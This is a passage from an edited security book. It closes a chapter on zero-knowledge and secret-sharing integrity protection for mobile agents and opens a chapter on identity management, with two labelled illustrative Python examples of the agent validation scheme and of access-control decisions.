The proposed scheme should be used with more than one identity. This would make it very hard to manipulate the code and the data. The best approach is to use one secret for each host. We assume that the malicious host is able to read and manipulate an agent's data and code. He/she can try to obtain the proper shares from an agent's execution state. The host can also try to obtain a proper secret and manipulate the agent's state and variables in a way that the obtained secret would



stay the same. But the host does not know the other secrets that are composed into the agents; also he/she does not know more shares to recreate those secrets, so any manipulation would be detected by the next host.

The protocol is not able to prevent attacks that are aimed at destroying the agent's data or code, meaning that a malicious host can "invalidate" any agent's data. But this is always a risk, since the host can simply delete an agent.

• Weak forward integrity: The proposed method possesses the weak forward integrity property: the malicious host cannot efficiently modify previously generated results.
• Strong forward integrity: The protocol also provides the agent with strong forward integrity, because the host cannot change previously stored results (without knowledge of the secrets created for other hosts). He/she also cannot modify the agent in a way that would be undetectable by the next host on the itinerary or by the owner.
• Publicly verifiable forward integrity: Each host can only verify that the agent's code or the execution state has not been changed. They cannot check whether the data obtained on other platforms has been modified. Only the agent's owner, who created all secrets, can do this.
• Black-box security: The proposed system is not resistant to read attacks. A malicious host can modify the code or data, but this is detectable by the agent's owner, so it is resistant to manipulation attacks. The system does not have the full black-box property.

Comparison with Other Methods

It is a difficult task to compare systems based on such different approaches as presented here. We decided to split the comparison into two categories:

• Practical evaluation: Whether the method is hard or easy to implement:
  ◦ Hard: No practical implementation exists at the moment
  ◦ Medium: The method has been implemented, with much effort
  ◦ Easy: The method is widely used and has been implemented for different purposes
  and what elements of an agent it protects.
• Theoretical evaluation: Whether the method satisfies the security definitions from the Definitions and Notions section.

The theoretical evaluation is quite hard, because some methods that have the black-box property do not "fit" the other definitions. If the code or data cannot be read or manipulated (the ideal case), then how can we discuss whether it is verifiable, or whether it fulfills forward integrity?

As for the evaluation of the black-box property, it is very hard to provide code that cannot be read. In all cases marked by * (see Table 2) the adversary can modify the agent, but not in a way that the owner or another host would not notice. This means that no efficient manipulation attack can be made, so one part of the black-box property is satisfied.

In the case marked by #, publicly verifiable forward integrity is satisfied only partially, because the agent's code can be verified but the data cannot.

Scalability

The initialization phase. The first phase is similar to the bootstrap phase of the system. The hosts and the manager create a static network. It is typical for agent systems that the manager or the owner of an agent knows all hosts, so distribution of all IDs and shares is efficient. We can compare this to sending a single routing update for the entire network as in the OSPF protocol (flooding). Whenever a new agent is added to the system, the same amount of information has to be sent to all hosts. Since the messages are not long (a single share and a few IDs) and are generated only during the creation of a new agent, that amount of information should not be a problem. The sizes of the parameters (key lengths, number of puzzles, and number of shares) are appropriately adjusted to the size of the agent network.

The operating phase. During the validation phase no additional communication between the manager and the hosts is required.



Table 1. Practical comparison of the integrity protection methods

Method                 Implementation   Protects code   Protects data   Protects execution state
Encryption functions   Hard             Yes             Yes             No
Obfuscated code        Medium           Yes             No              No
Cryptographic traces   Hard             Yes             No              Yes
Watermarking           Easy             Yes             Yes             No
Fingerprinting         Easy             Yes             Yes             No
Zero knowledge proof   Easy             Yes             Yes             Yes

Table 2. Theoretical comparison of integrity protection methods

Method                 Weak forward   Strong forward   Publicly verifiable   Black-box
                       integrity      integrity        forward integrity     property
Encryption functions   No             No               No                    Yes
Obfuscated code        Yes            Yes              No                    Partially*
Cryptographic traces   Yes            Yes              Yes                   No
Watermarking           Yes            No               No                    Partially*
Fingerprinting         Yes            Yes              No                    Partially*
Zero knowledge proof   Yes            Yes              No#                   Partially*
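An added end-to-end example of the Initial Phase and Validation Phase described above (the editor's illustration, not the chapter's implementation): the manager fixes a secret N and its public identity ID, fits a threshold-3 Shamir polynomial through (0, N) and the t-1 = 2 shares that the agent derives from a hash of its code, its execution state f_j and a host-specific c_i, and hands the host the remaining share. On arrival the agent recovers σ and proves knowledge of it to the host with a Fiat-Shamir zero-knowledge identification. Assumptions of the example: the concrete ZK protocol (Fiat-Shamir, not necessarily the one the authors intended), the Mersenne-prime field and modulus, SHA-512 as the share-derivation hash, and the constructed agent code, state names and host names.

```python
import hashlib
import secrets

# Toy parameters (assumptions of this example, far too small for real use).
FIELD = (1 << 521) - 1                       # Mersenne prime: field for Shamir secret sharing
MODULUS = ((1 << 61) - 1) * ((1 << 89) - 1)  # product of two Mersenne primes for Fiat-Shamir
T = 3          # threshold: t-1 = 2 shares are derived from the agent, 1 comes from the host
ROUNDS = 32    # Fiat-Shamir rounds; a prover without sigma passes with probability 2^-ROUNDS


def lagrange_at(points, x):
    """Value at x of the unique polynomial over GF(FIELD) through the given (x_i, y_i)."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num = den = 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (x - xj) % FIELD
                den = den * (xi - xj) % FIELD
        total = (total + yi * num * pow(den, -1, FIELD)) % FIELD
    return total


def derived_shares(code, state, host_id):
    """Step 3 of the initial phase (the 'glue'): the t-1 shares that the agent can recompute
    only from its own code, the execution state f_j and the host-specific input c_i."""
    shares = []
    for j in range(1, T):
        material = b"|".join([hashlib.sha256(code).digest(), state.encode(),
                              host_id.encode(), str(j).encode()])
        shares.append((j, int.from_bytes(hashlib.sha512(material).digest(), "big") % FIELD))
    return shares


def manager_setup(code, state, host_id, host_x=T):
    """Initial phase: choose the secret N, publish ID = N^2 mod MODULUS, fit the sharing
    polynomial through (0, N) and the agent-derived points, and return the host's share."""
    n_secret = secrets.randbelow(MODULUS - 2) + 2
    identity = pow(n_secret, 2, MODULUS)
    points = [(0, n_secret)] + derived_shares(code, state, host_id)
    return identity, (host_x, lagrange_at(points, host_x))


def agent_recover_secret(code, state, host_id, host_share):
    """Validation phase, steps 1-2: with the host's share plus its own derived shares the
    agent interpolates at 0; the result equals N only if code and state are untouched."""
    return lagrange_at(derived_shares(code, state, host_id) + [host_share], 0)


def zk_identify(sigma, identity, rounds=ROUNDS):
    """Step 3: Fiat-Shamir identification. The agent (prover) shows it knows a square root
    of ID mod MODULUS; the host (verifier) learns nothing about sigma itself."""
    for _ in range(rounds):
        r = secrets.randbelow(MODULUS - 2) + 2
        x = pow(r, 2, MODULUS)                          # prover -> verifier: commitment
        e = secrets.randbelow(2)                        # verifier -> prover: 1-bit challenge
        y = r * pow(sigma, e, MODULUS) % MODULUS        # prover -> verifier: response
        if pow(y, 2, MODULUS) != x * pow(identity, e, MODULUS) % MODULUS:
            return False
    return True


def validate(code, state, host_id, host_share, identity):
    """What a host runs on the agent's arrival: accept only if the recovered secret proves."""
    return zk_identify(agent_recover_secret(code, state, host_id, host_share), identity)


if __name__ == "__main__":
    code = b"def collect(offer): return offer"      # constructed stand-in for the agent's code
    identity, share = manager_setup(code, "f_gather", "host-B")
    print(validate(code, "f_gather", "host-B", share, identity))          # True
    print(validate(code + b"#", "f_gather", "host-B", share, identity))   # False: code tampered
    print(validate(code, "f_store", "host-B", share, identity))           # False: wrong state
```

Two things the code makes concrete that the prose leaves implicit: the manager never ships N itself (only the public ID and one share per host), and a host that changes a single byte of code, or reaches the check in the wrong state, recovers a random field element whose square does not match ID, so the proof fails on the first challenge bit of 1. The example does not bind the host's share to the host's channel; the secure distribution in step 2 is assumed.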

Modifications

A similar scenario can be used to provide integrity to the data obtained by the agent from different hosts. A malicious host could try to manipulate the data delivered to the agent by the previously visited hosts. To ensure that this is not possible, the agent can use the zero-knowledge protocol to protect the data. For each stored piece of data, the agent can create a unique "proof" utilizing the zero-knowledge protocol. Any third party who does not possess $\sigma$ is not able to modify the proof. So the manager, knowing $\sigma$, can be sure that the data was not manipulated.

An area for development of the proposed integrity solution is to find the most appropriate function for composing secrets into hosts: The proposed solution fulfills the requirements, but some additional evaluation should be done. The next possibility for future work would be to integrate the proposed solution into some agent security architecture, possibly one that would also provide an agent with strong authentication methods and anonymity (Zwierko & Kotulski, 2005). Then, such a complex system should be evaluated and implemented as a whole. A good example of such a system would be an agent-based electronic elections system for mobile devices, where code integrity together with anonymous authentication is crucial for the correctness of the system (Zwierko & Kotulski, in press).

FUTURE TRENDS

In this chapter we presented methods of protection of mobile agents against attacks on their integrity. The methods offer protection on a certain level, but



the agents' security can be significantly increased by avoiding risky behavior, especially visiting suspicious hosts. This can be done by using mechanisms built into individual agents or by distributed solutions based on the cooperation of agents and hosts. The most promising solutions for improvement of mobile code security can be based on risk analysis or on reputation systems. The first one needs some built-in analysis tools while the second one requires a trust management infrastructure.

Risk analysis is one of the most powerful tools used in economics, industry, and software engineering (Tixier, Dusserre, Salvi, & Gaston, 2002). Most business enterprises carry out such an analysis for all transactions. A multi-agent or mobile agent system can easily be compared with such an economic-like scenario: There are a lot of parties making transactions with other parties. Risk analysis could be utilized to estimate how high the probability is that a selected agent platform is going to harm the agent. The biggest advantage of this solution is that it does not require any form of cooperation between different managers: Everyone can make their own analysis based on gathered knowledge. However, cooperation between different managers can result in a better analysis.

Reputation systems (Sabater & Sierra, 2005; Zacharia & Maes, 2000) are well known and utilized in different applications, especially in peer-to-peer environments. They enable the detection of malicious parties based on their previous behavior, registered, valuated, and published. We can imagine an agent system where managers and owners of agents would also rate agent platforms based on their previous actions towards the agents. Of course, such a system still requires some integrity protection mechanisms, which could be used to verify whether the results obtained by the agent are correct. However, the applied mechanism can be rather simple, not as complicated as some of the presented methods, for example, EFs.

CONCLUDING REMARKS

Among security services for stored data protection, two are the most important: availability and integrity. Unavailable data is useless for a potential user. Also, data that has been illegally damaged or falsified is a worthless source of information. No other protection makes sense if the data's content is destroyed. In the case of executables we face analogous problems. Among others, the executables must be available and protected against falsification (that is, unauthorized changes of the designed functioning, internal state and the carried data). The problem of availability has been successfully solved by the concept of mobile agents that simply go to the destination place and work there. However, this solution made the problem of integrity of the mobile code or mobile agent even more important than in the case of stored data. A falsified mobile agent is not only useless; it can even be harmful as an active party making some unplanned actions. Therefore, preserving agents' integrity is a fundamental condition of their proper functioning.

In this chapter we made an overview of the existing protocols and methods for preserving an agent's integrity. The basic definitions and notions were introduced. The most important mechanisms were presented and discussed. We also proposed a new concept for the detection of tampering with an agent, based on a zero-knowledge proof system. The proposed scheme secures both an agent's execution state and its internal data along with its code. For practical implementation the system requires some additional research and development work, but it looks to be a promising solution to the problem of providing an agent with effective and strong countermeasures against attacks on its integrity.

REFERENCES

Alves-Foss, J., Harrison, S., & Lee, H. (2004, January 5-8). The use of encrypted functions for mobile agent security. In Proceedings of the 37th Hawaii International Conference on System Sciences, Track 9 (p. 90297b). IEEE Computer Society Press.

Benachenhou, L., & Pierre, S. (2006). Protection of a mobile agent with a reference clone. Computer Communications, 29(2), 268-278.


Burmester, M., Chrissikopoulos, V., & Kotzanikolaou, P. (2000). Secure transactions with mobile agents in hostile environments. In E. Dawson, A. Clark, & C. Boyd (Eds.), Information security and privacy: Proceedings of the 5th Australasian Conference ACISP (LNCS 1841, pp. 289-297). Berlin, Germany: Springer.

Collberg, C., Thomborson, C., & Low, D. (1997). A taxonomy of obfuscating transformations (Tech. Rep. No. 148). Auckland, New Zealand: The University of Auckland.

Corradi, A., Cremonini, M., Montanari, R., & Stefanelli, C. (1999). Mobile agents integrity for electronic commerce applications. Information Systems, 24(6), 519-533.

Esparza, O., Fernandez, M., Soriano, M., Munoz, J. L., & Forne, J. (2003). Mobile agents watermarking and fingerprinting: Tracing malicious hosts. In V. Mařík, W. Retschitzegger, & O. Štěpánková (Eds.), Proceedings of Database and Expert Systems Applications (DEXA 2003) (LNCS 2736, pp. 927-936). Berlin, Germany: Springer.

Goldreich, O. (2002). Zero-knowledge twenty years after its invention (IACR Cryptology ePrint Archive, Report 2002/186).

Hohl, F. (1998). Time limited blackbox security: Protecting mobile agents from malicious hosts. In G. Vigna (Ed.), Mobile agents and security (LNCS 1419, pp. 92-113). Berlin, Germany: Springer.

Jansen, W. A. (2000). Countermeasures for mobile agent security. Computer Communications, 23(17), 1667-1676. [Special issue]

Jansen, W. A., & Karygiannis, T. (1999). Mobile agents security (NIST Special Publication 800-19). Gaithersburg, MD: National Institute of Standards and Technology.

Karjoth, G., Asokan, N., & Gulcu, C. (1999). Protecting the computation results of free-roaming agents. In K. Rothermel & F. Hohl (Eds.), Proceedings of the Second International Workshop on Mobile Agents (MA'98) (LNCS 1477, pp. 195-207). Berlin, Germany: Springer.

Kulesza, K., & Kotulski, Z. (2003). Decision systems in distributed environments: Mobile agents and their role in modern e-commerce. In A. Lapinska (Ed.), Proceedings of the Conference "Information in XXI Century Society" (pp. 271-282). Olsztyn: Warmia-Mazury University Publishing.

Kulesza, K., Kotulski, Z., & Kulesza, K. (2006). On mobile agents resistant to traffic analysis. Electronic Notes in Theoretical Computer Science, 142, 181-193.

Low, D. (1998). Protecting Java code via code obfuscation. Crossroads, 4(3), 21-23.

Man, C., & Wei, V. (2001). A taxonomy for attacks on mobile agent. In Proceedings of the International Conference on Trends in Communications, EUROCON'2001 (pp. 385-388). IEEE Computer Society Press.

Oppliger, R. (2000). Security technologies for the World Wide Web. Computer Security Series. Norwood, MA: Artech House Publishers.

Pieprzyk, J., Hardjono, T., & Seberry, J. (2003). Fundamentals of computer security. Berlin, Germany: Springer.

Riordan, J., & Schneier, B. (1998). Environmental key generation towards clueless agents. In G. Vigna (Ed.), Mobile agents and security (LNCS 1419, pp. 15-24). Berlin, Germany: Springer.

Sabater, J., & Sierra, C. (2005). Review on computational trust and reputation models. Artificial Intelligence Review, 24(1), 33-60.

Sander, T., & Tschudin, C. F. (1998, May 3-6). Towards mobile cryptography. In Proceedings of the 1998 IEEE Symposium on Security and Privacy (pp. 215-224). IEEE Computer Society Press.

Schneider, F. B. (1997). Towards fault-tolerant and secure agentry. In M. Mavronicolas (Ed.), Proceedings of the 11th International Workshop on Distributed Algorithms (pp. 1-14). Berlin, Germany: Springer.

Shao, M., & Zhou, J. (2006). Protecting mobile-agent data collection against blocking attacks. Computer Standards & Interfaces, 28(5), 600-611.


Security of Mobile Code

KEY TERMS

Agent Platform (Host): Agent platform is a computer where an agent's code or program is executed. The software agent cannot perform its actions outside hosts. The host protects agents against external attacks.

Cryptographic Protocol: Cryptographic protocol is a sequence of steps performed by two or more parties to obtain a goal precisely according to assumed rules. To assure this purpose the parties use cryptographic services and techniques. They realize the protocol by exchanging tokens.

Intelligent Software Agent: Intelligent software agent is an agent that uses artificial intelligence in the pursuit of its goals in contacts with hosts and other agents.

Mobile Agent: Mobile agent is an agent that can move among different platforms (hosts) at different times, while a stationary agent resides permanently at a single platform (host).

Security Services: Security services guarantee protecting agents against attacks. During the agent's transportation the code is protected as a usual
At the host site, the agent is open for modification and very specific methods must be applied for protection. For the agent's protection the following security services can be utilized:

• Confidentiality: Confidentiality is any private data stored on a platform or carried by an agent that must remain confidential. Mobile agents also need to keep their present location and the whole route confidential.
• Integrity: Integrity exists when the agent platform protects agents from unauthorized modification of their code, state, and data and ensures that only authorized agents or processes carry out any modification of the shared data.
• Accountability: Accountability exists when each agent on a given platform must be held accountable for its actions: it must be uniquely identified, authenticated, and audited.
• Availability: Availability exists when every agent (local, remote) is able to access data and services on an agent platform, which is responsible for providing them.
• Anonymity: Anonymity is when agents' actions and data are anonymous for hosts and other agents; still, accountability should be enabled.

Software Agent: Software agent is a piece of code or computer program that can exercise an individual's or organization's authority, work autonomously at a host toward a goal, and meet and interact with other agents.

Strong Mobility: Strong mobility of an agent means that a running program along with its particular (actual) state is moving from one host site to another.

Weak Mobility: Weak mobility of an agent means that only the agent's code is migrating and no execution state is sent along with the agent program.




Chapter IV
Identity Management

Kumbesan Sandrasegaran
University of Technology, Sydney, Australia

Mo Li
University of Technology, Sydney, Australia

ABSTRACT

The broad aim of identity management (IdM) is to manage the resources of an organization (such as files, records, data, and communication infrastructure and services) and to control and manage access to those resources in an efficient and accurate way. Consequently, identity management is both a technical and process-orientated concept. The concept of IdM has begun to be applied in identities-related applications in enterprises, governments, and Web services since 2002. As the integration of heterogeneous wireless networks becomes a key issue in the next generation (NG) networks, IdM will be crucial to the success of NG wireless networks. A number of issues, such as mobility management, multi-provider and securities require the corresponding solutions in terms of user authentication, access control, and so forth. IdM in NG wireless networks is about managing the digital identity of a user and ensuring that users have fast, reliable, and secure access to distributed resources and services of a next generation network (NGN) and the associated service providers, across multiple systems and business contexts.

INTRODUCTION

The broad aim of identity management (IdM) is to manage the resources of an organisation (such as files, records, data, and communication infrastructure and services) and to control and manage access to those resources in an efficient and accurate way (which in part usually involves a degree of automation). Consequently, IdM is both a technical and process-orientated concept.

The concept of IdM has begun to be applied in identities-related applications in enterprise, governments, and Web services since 2002. As the integration of heterogeneous wireless networks becomes a key issue in the fourth generation (4G) wireless networks, IdM will become crucial to the success of next generation (NG) wireless networks. A number of issues, such as mobility management, multi-provider, and securities require the corresponding solutions in terms of user authentication, access control, and so forth. Although IdM processes require the integration into existing business processes at several levels (Titterington, 2005), it remains an opportunity for NG wireless networks.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

IdM in NG wireless networks is about managing the digital identity of a user and ensuring that users have fast, reliable, and secure access to distributed resources and services of NG wireless networks and associated service providers across multiple systems and business contexts.

Definition

Given the open and currently non-standardised nature of IdM, there are varying views as to the exact definition of IdM. These include:

By HP (Clercq & Rouault, 2004):
Identity Management can be defined as the set of processes, tools and social contracts surrounding the creation, maintenance, utilization and termination of a digital identity for people or, more generally, for systems and services to enable secure access to an expanding set of systems and applications.

By Reed (2002):
The essence of Identity Management as a solution is to provide a combination of processes and technologies to manage and secure access to the information and resources of an organisation while also protecting users' profiles.

By Cisco Systems (2005):
Businesses need to effectively and securely manage who and what can access the network, as well as when, where, and how that access can occur... lets enterprises secure network access and admission at any point in the network, and it isolates and controls infected or unpatched (sic) devices that attempt to access the network.

Objectives

As IdM can be used in different areas such as enterprise, government, Web services, telecommunication networks and so forth, its objectives differ between contexts. Generally, an IdM system is expected to satisfy the following objectives (Reed, 2002):

• It should define the identity of an entity (a person, place, or thing).
• It should store relevant information about entities, such as names and credentials, in a secure, flexible, customisable store.
• It should make the information accessible through a set of standard interfaces.
• It should provide a resilient, distributed, and high performance infrastructure for identity management.
• It should help to manage relationships between the enterprise and the resources and other entities in a defined context.

Main Aspects

Authentication

Authentication is the process by which an entity provides its identity to another party, for example, by showing photo ID to a bank teller or entering a password on a computer system. This process is broken down into several methods which may involve something the user knows (e.g., password), something the user has (e.g., card), or something the user is (e.g., fingerprint, iris, etc.). Authentication can take many forms, and may even utilise combinations of these methods.

Authorisation

Authorisation is the process of granting access to a service or information based on a user's role in an organisation. Once a user is authenticated, the system then must ensure that a particular user has access to a particular resource.

Access Control

Access control is used to determine what a user can or cannot do in a particular context (e.g., a user may have access to a particular resource/file but only during a certain time of day, e.g., work hours, or only from a certain device, e.g., a desktop in the office).



Auditing and Reporting

Auditing and reporting involves the creation and keeping of records, whether for business reasons (e.g., customer transactions), but also providing a "trail" in the event that the system is compromised or found faulty.

DIGITAL IDENTITY

What is Digital Identity?

In a business transaction, identity is used to establish a level of trust upon which business can be conducted. Trust in this context is the confidence that each party they are dealing with is who he/she claims to be. Traditionally, such trust was established with the use of an observable physical attribute of an entity. For example, business dealings were in person (appearance), on the phone (voice), or with the use of signatures on contracts (handwriting).

The identity of an individual is defined as the set of information known about that person (Pato & Rouault, 2003). For example, an identity in the real world can be a set of names, addresses, driver's licenses, birth certificate, and so forth.

With the development and widespread use of digital technologies, entities have been able to communicate with each other without being physically present. In some cases, the first meeting and possibly the entirety of the transaction between two parties is held over a digital medium. There is a growing need for trust to be established in transactions over the digital world.

Digital identity is the means that an entity can use to identify themselves in a digital world (i.e., data that can be transferred digitally, over a network, file, etc.). The aim of digital identity is to create the same level of confidence and trust that a face to face transaction would generate.

Composition of Digital Identity

A digital identity seeks to digitise an individual's identity to the extent that they cannot be mistaken for someone else and that it is difficult for another person to impersonate that individual. In a typical face to face situation, identity comprises two parts: the actual identity of the entity (something that can be observed by human senses) and the credentials or what they use to prove their identity. In Reed (2002), the attributes of digital identity are given as follows:

Who You Are

"Who you are" is the attribute that in a real world context uniquely identifies a single entity. These can include knowledge or data that is only known by that entity, unique physical characteristics of that entity, or items that the entity has.

Context

Context can refer to the type of transaction or organisation that the entity is identifying itself to, as well as the manner in which the transaction is made. Different constraints on digital identity may be enforced depending on the context. For example, sensitive transactions related to birth certificate information over phone or internet may be prohibited.

Profile

A profile consists of data needed to provide services to users once their identity has been verified. A user profile could include what an entity can do, what they have subscribed to, what groups they are a member of, their selected services, and so forth. The profile of a user will change during the course of interaction with a service provider.

Of particular consideration is the concept of "context." Depending on the context, we differ in the actions that we are able to do as individuals. In an Internet shopping context, we may only be able to browse or purchase items. In a corporate context, it may enable us to access files or otherwise do some other activity.

Context is also important from a digital identity perspective as it is likely to determine the amount and type of identity information that is needed in order for the determined level of "trust" to be available. For example, in an e-mail context, the amount of identifying information that is necessary is usually only two things: a username and password. However, with more security conscious



applications, for example, bank transactions and governmental functions, more information is usually required (e.g., birth certificates, credit card numbers, and the like).

The digital identity of an individual user forms the main focus of security threats to any IdM system. As such, there are typical measures that must be taken to ensure that digital identities are kept securely.

Usage of Digital Identity

Digital identity can be used for authentication. It is where an entity must "prove" digitally that it is the one that it claims to be. It is at this stage that the credentials of digital identity are used. The simplest form of authentication is the use of a username and corresponding password. This is known as "single factor" authentication, since only a single attribute is used to determine the identity. Stronger authentication is usually obtained by not only increasing the number of attributes that are used, but also by including different types. To add to the previous example scheme, in addition to the password, an entity could also be called upon to have a particular piece of hardware plugged in, providing a "two factor" scheme (DIGITALIDWORLD, 2005).

Once an entity is authenticated, a digital identity is used to determine what that entity is authorised to do. This is where the profile of a digital identity is required. As an example, authorisation can be seen as the difference between an "administrator" and a "user" who share the same resource (for example, a computer). Both may be authenticated to use the computer, but the actions that each may do with that resource are determined by the authorisation. Authentication attempts to establish a level of confidence that a certain thing holds true; authorisation decides what the user is allowed to do.

Accounting provides an organisation with the ability to track unauthorised access when it occurs. Accounting involves the recording and logging of entities and their activities within the context of a particular organisation, Web site, and so forth.

PROS AND CONS OF IDENTITY MANAGEMENT

Benefits of Identity Management

Reduce Total Cost of Ownership (TCO) for All Systems

Cost reduction by IdM usually is a result of more efficient use of personnel and resources, especially with regards to the following administrative bureaucracy. Examples include (Courion, 2005):

• Reducing the costs of auditing by providing real-time verification of user access rights and policy awareness enforcement
• Eliminating account administration such as account add/move/change and calls to information security staff for digital certificate registration
• Eliminating calls for password reset (the #1 support call) to internal or outsourced help desks
• Streamlining IT operations for more efficient management and reallocation to more strategic projects
• Reducing management overhead (Reed, 2002)

Competitive Advantage Through Streamlining and Automation of Business Processes

This competitive advantage is delivered by cutting down costs in areas with a high need for unnecessary support and being able to:

• Offer users a fast, secure way to access revenue-generating systems, applications, and Web portals (Courion, 2005)
• Provide faster response to "password reset" and "insufficient access" user lockouts, thus increasing system and data availability (Courion, 2005)
• Provide 24x7x365, unassisted self-service for the most common of help desk calls (Courion, 2005)
• Improve customer and employee service; maintain confidentiality and control of customers, suppliers, and employees (Reed, 2002)
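The three aspects introduced under Main Aspects (authentication with one or two factors, role-based authorisation, context-dependent access control) and the accounting trail described under Usage of Digital Identity can be chained into a single access decision. The following Python program is an added example written for this chapter; it is not code from the chapter or from any IdM product. The users, roles, device identifiers, office hours and the payroll policy are constructed, and the HOTP-style counter code stands in for the "particular piece of hardware" of the two-factor scheme.

```python
"""Added example (not from the chapter): one access decision chaining
authentication, role-based authorisation and context-based access control,
with an accounting trail. Users, roles, devices, hours and the policy are
constructed for illustration."""
from dataclasses import dataclass
from datetime import datetime
from typing import Optional
import hashlib
import hmac
import secrets


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow password hash (PBKDF2 from the standard library)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def token_code(secret: bytes, counter: int) -> str:
    """Six-digit HOTP-style code: the 'something you have' factor."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), "sha256").digest()
    return f"{int.from_bytes(mac[:4], 'big') % 1_000_000:06d}"


@dataclass
class Account:
    username: str
    role: str                        # drives authorisation
    salt: bytes
    pw_hash: bytes
    token_secret: Optional[bytes]    # None if no second factor is enrolled


def make_account(username: str, role: str, password: str, enrol_token: bool) -> Account:
    salt = secrets.token_bytes(16)
    return Account(username, role, salt, hash_password(password, salt),
                   secrets.token_bytes(32) if enrol_token else None)


def authenticate(acct: Account, password: str, code: Optional[str], counter: int) -> int:
    """Return the number of factors verified: 0 (failed), 1 or 2."""
    if not hmac.compare_digest(hash_password(password, acct.salt), acct.pw_hash):
        return 0
    if acct.token_secret is None:
        return 1          # single-factor account
    # An enrolled token that is absent or wrong fails the login outright.
    if code is None or not hmac.compare_digest(code, token_code(acct.token_secret, counter)):
        return 0
    return 2


@dataclass
class Policy:
    resource: str
    roles: dict                      # action -> roles authorised for it
    min_factors: int                 # authentication strength the resource demands
    work_hours: Optional[tuple]      # (start_hour, end_hour) or None for any time
    devices: Optional[set]           # permitted device ids or None for any device


def decide(acct: Account, factors: int, policy: Policy, action: str,
           when: datetime, device: str, audit_log: list) -> bool:
    """Authentication strength, then role, then context; every outcome is logged."""
    if factors == 0:
        reason = "authentication failed"
    elif factors < policy.min_factors:
        reason = "insufficient authentication factors"
    elif acct.role not in policy.roles.get(action, set()):
        reason = "role not authorised for action"
    elif policy.work_hours and not policy.work_hours[0] <= when.hour < policy.work_hours[1]:
        reason = "outside permitted hours"
    elif policy.devices is not None and device not in policy.devices:
        reason = "device not permitted"
    else:
        reason = "allowed"
    # Accounting: who, what, which resource, from where, and the outcome.
    audit_log.append((when.isoformat(), acct.username, action, policy.resource, device, reason))
    return reason == "allowed"


# Constructed policy: users may read the payroll file in office hours from the
# office desktop; only administrators may write; two factors are always required.
PAYROLL = Policy("payroll.xlsx", {"read": {"user", "administrator"}, "write": {"administrator"}},
                 min_factors=2, work_hours=(9, 17), devices={"office-desktop-01"})


def demo() -> list:
    """Run constructed requests against PAYROLL and return the audit trail."""
    alice = make_account("alice", "user", "alice-pass", enrol_token=True)
    bob = make_account("bob", "administrator", "bob-pass", enrol_token=True)
    code_a, code_b = token_code(alice.token_secret, 7), token_code(bob.token_secret, 3)
    ten_am, eight_pm = datetime(2008, 3, 3, 10, 0), datetime(2008, 3, 3, 20, 0)
    desk, laptop = "office-desktop-01", "home-laptop"
    log = []
    decide(alice, authenticate(alice, "alice-pass", code_a, 7), PAYROLL, "read", ten_am, desk, log)
    decide(alice, authenticate(alice, "alice-pass", code_a, 7), PAYROLL, "write", ten_am, desk, log)
    decide(alice, authenticate(alice, "alice-pass", code_a, 7), PAYROLL, "read", eight_pm, desk, log)
    decide(alice, authenticate(alice, "alice-pass", None, 7), PAYROLL, "read", ten_am, desk, log)
    decide(bob, authenticate(bob, "bob-pass", code_b, 3), PAYROLL, "write", ten_am, laptop, log)
    decide(bob, authenticate(bob, "bob-pass", code_b, 3), PAYROLL, "write", ten_am, desk, log)
    return log


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

The order of the checks matters: a failed or weak login is rejected before any role or context is consulted, so the audit trail records why each request was refused, and a missing second factor on an enrolled account is a failure rather than a silent downgrade to single-factor access.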



• Reduce time for new employees to gain access to required resources for work (Reed, 2002)

Increase Data Security

Data security includes the typical protection of data from unauthorised users as well as ensuring that the data being used is kept up to date across the organisation and is safe from inadvertent or intentional tampering by unauthorised users within the organisation.

• Minimise the "security gap" that exists between the time when employees leave a company and their accounts are disabled (Courion, 2005)
• Reduce the intrusion risk due to orphaned or dormant accounts (by ex-employees or those posing as ex-employees) (Courion, 2005)
• Enforce the policies of consistent account provisioning to make sure that only those who need access get access (Courion, 2005)
• Enforce consistent password policies for stronger authentication (Courion, 2005)
• Reduce security threats (e.g., human error) through policy based automation (Courion, 2005)
• Ensure accurate audit trails for intrusion prevention and security reporting (Courion, 2005)
• Provide faster response to account access requests or password reset, thus reducing the need for proliferating "superuser" privileges (Courion, 2005)
• Increase the opportunity of adopting the Public Key Infrastructure by removing the biggest barrier (Courion, 2005)
• Reduce risk of incorrect information being used (Reed, 2002)

Support Legal Initiatives and Demonstrate Compliance (Courion, 2005; Reed, 2002)

In the case of legal initiatives, IdM can be used successfully to demonstrate a systematic and effective approach to safeguarding an organisation's assets and its business partners' (customers, suppliers, contractors, clients) assets. It also presents a method of ensuring that policies are enforced away from human effort and decision making (where often the process breaks down or is ignored). In summary, it can:

• Demonstrate policy enforcement
• Proactively verify the access rights of a user
• Enable policy awareness testing
• Eliminate orphaned accounts systematically
• Increase protected data privacy

Additional benefits, mainly business centric, are described in more detail by Fujitsu (Locke & McCarthy, 2002):

• Know who everyone is in the organisations: Applied to the larger scale of the NG wireless networks, this prevents any user from "slipping through the cracks" whether they are employees or subscribers. Typically, telecommunications providers are adept at keeping customer records, but suffer the same problems with keeping track of staff. An IdM system will enable the organisation to keep stock of all their users.
• Accurate and consistent people data in all systems: This is particularly relevant to the existing telecommunications providers. Although services vary, the majority of providers have some lag between the time a record is changed, compared to when that change is made into the records that the company keeps. Typically, this results in undue delays when an existing or new subscriber wishes to get access to their new services. By speeding up the process by which data on users can be updated, this reduces the delay in service provisioning and offers a significantly better level of quality of service.
• Single source of data input/storage: This feature has already been explored as one of the benefits of an IdM system. Although a distributed system must spread the location and access points for the data that it stores, by having one central system for organising



it, any additional processing that needs to be done, particularly when bridging between two different types of systems or departments, is avoided.

In general, IdM is used to provide an efficient system that covers all users within an organisation. It promotes a single system that does the entire task rather than several systems that conflict or compete with each other.

Drawbacks of Identity Management

IdM, while bringing several advantages to an organisation, may have several applicable drawbacks. These include:

